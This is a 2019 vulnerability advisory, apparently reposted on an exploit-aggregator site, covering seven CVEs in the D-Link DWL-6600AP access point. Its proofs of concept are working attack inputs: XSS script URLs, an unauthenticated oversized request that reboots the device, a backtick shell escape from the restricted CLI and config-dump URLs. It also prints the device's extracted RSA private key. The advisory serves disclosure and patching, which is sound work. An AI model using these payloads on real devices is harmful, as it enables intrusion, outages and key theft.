Exploit for D-Link 6600-AP XSS / DoS / Information Disclosure CVE-2019-14334 CVE-2019-14333 CVE-2019-14335 CVE-2019-14338 CVE-2019-14336 CVE-2019-14337 CVE-2019-14332

Name: Exploit for D-Link 6600-AP XSS / DoS / Information Disclosure CVE-2019-14334 CVE-2019-14333 CVE-2019-14335 CVE-2019-14338 CVE-2019-14336 CVE-2019-14337 CVE-2019-14332
Rating: 5 (162 reviews)
2019-07-31 | CVSS -0.7
## https://sploitus.com/exploit?id=PACKETSTORM:153840
# Security Advisory - 22/07/2019  
  
## Multiple vulnerabilities found in the D-Link 6600-AP device running  
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced  
anymore but the support is still provided by D-Link as per described  
on the D-Link website. Not that this product is built for business  
customers of D-Link and we can expect to have thousands of devices at  
risk. Code base shared with DWL-3600AP and DWL-8610AP  
  
### This advisory is sent to D-Link the 22/05/2019  
Many Thanks to the D-Link Security Team for their prompt reactivity!  
  
### Affected Product  
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP  
  
### Firmware version  
4.2.0.14 Revision Ax date: 21/03/2019  
  
### Last version available  
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point  
  
### Product Identifier  
WLAN-EAP  
  
### Hardware Version  
A2  
  
### Manufacturer  
D-LINK  
  
## Product Description  
The DWL-6600AP is designed to be the best-in-class indoor Access Point  
for business environments. With high data transmission speeds, load  
balancing features, it can be deployed as a standalone wireless Access  
Point or used as the foundation for a managed wireless network.  
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point  
  
## List of Vulnerabilities  
  
1. CVE-2019-14338 - Post-authenticated XSS  
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private  
Key extraction  
through http command  
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to  
the reboot of the AP  
4. CVE-2019-14337 - Escape shell in the restricted command line interface  
5. CVE-2019-14335 - Post-authenticated Denial of service leading to  
the reboot of the AP  
6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)  
7. CVE-2019-14332 - Use of weak ciphers for SSH  
  
### 1. Post-authenticated XSS  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14338  
#### Proof-of concept  
  
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>  
  
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>  
  
### 2. Post-authenticated Certificate and RSA Private Key extraction  
through http command  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14334  
#### Proof-of concept  
  
http://10.90.90.91/sslcert-get.cgi?  
  
Result of the command: File "mini_httpd.pem" automatically extracted  
  
-----BEGIN RSA PRIVATE KEY-----  
MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee  
Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o  
BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B  
vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t  
7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c  
unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk  
1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6  
J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14  
yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z  
0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc  
fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB  
i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb  
dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ  
OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ  
VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9  
J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr  
H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw  
uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy  
yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd  
pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co  
paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8  
1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm  
fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS  
okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px  
bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY  
-----END RSA PRIVATE KEY-----  
-----BEGIN CERTIFICATE-----  
MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx  
MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp  
bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL  
MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU  
MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG  
A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE  
CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu  
OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB  
BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp  
wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC  
I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW  
2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK  
YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N  
29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B  
AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS  
7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME  
9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5  
beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE  
45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef  
MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==  
-----END CERTIFICATE-----  
  
### 3. Pre-authenticated Denial of service leading to the reboot of the AP  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID: CVE-2019-14333  
#### Proof-of concept  
kali# curl -X POST  
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
  
### 4. Escape shell in the restricted command line interface  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14337  
#### Proof-of concept  
  
DLINK-WLAN-AP# wget  
Invalid command.  
DLINK-WLAN-AP# `/bin/sh -c wget`  
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.  
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]  
[-O|--output-document FILE]  
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]  
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL  
  
Retrieve files via HTTP or FTP  
  
Options:  
-s Spider mode - only check file existence  
-c Continue retrieval of aborted transfer  
-q Quiet  
-P DIR Save to DIR (default .)  
-T SEC Network read timeout is SEC seconds  
-O FILE Save to FILE ('-' for stdout)  
-U STR Use STR for User-Agent header  
-Y Use proxy ('on' or 'off')  
  
DLINK-WLAN-AP#  
  
### 5. Post-authenticated Denial of service leading to the reboot of the AP  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14335  
#### Proof-of concept  
  
http://10.90.90.91/admin.cgi?action=%s  
  
### 6. Post-authenticated Dump all the config files  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14336  
#### Proof-of concept  
  
http://10.90.90.91/admin.cgi?action=  
  
### 7. Use of weak ciphers  
#### Exploitation: Local  
#### Severity Level: High  
#### CVE ID : CVE-2019-14332  
#### Proof-of concept  
  
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1  
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.  
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.  
Are you sure you want to continue connecting (yes/no)? yes  
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.  
admin@10.90.90.91's password:  
Enter 'help' for help.  
  
DLINK-WLAN-AP# help  
  
## Report Timeline  
22/05/2019 : This advisory is sent to D-Link - the contents of this  
Report will be made public within 30 days.  
22/06/2019 : Public release of the security advisory to mailing list  
  
## Fixes/Updates  
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip  
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip  
  
  
## About me - pwn.sandstorm@gmail.com  
#### Independent EMSecurity Researcher in the field of IoT under the Sun  
#### Always open to hack and share  
#### Greetings - Ack P. Kim and others for the online resources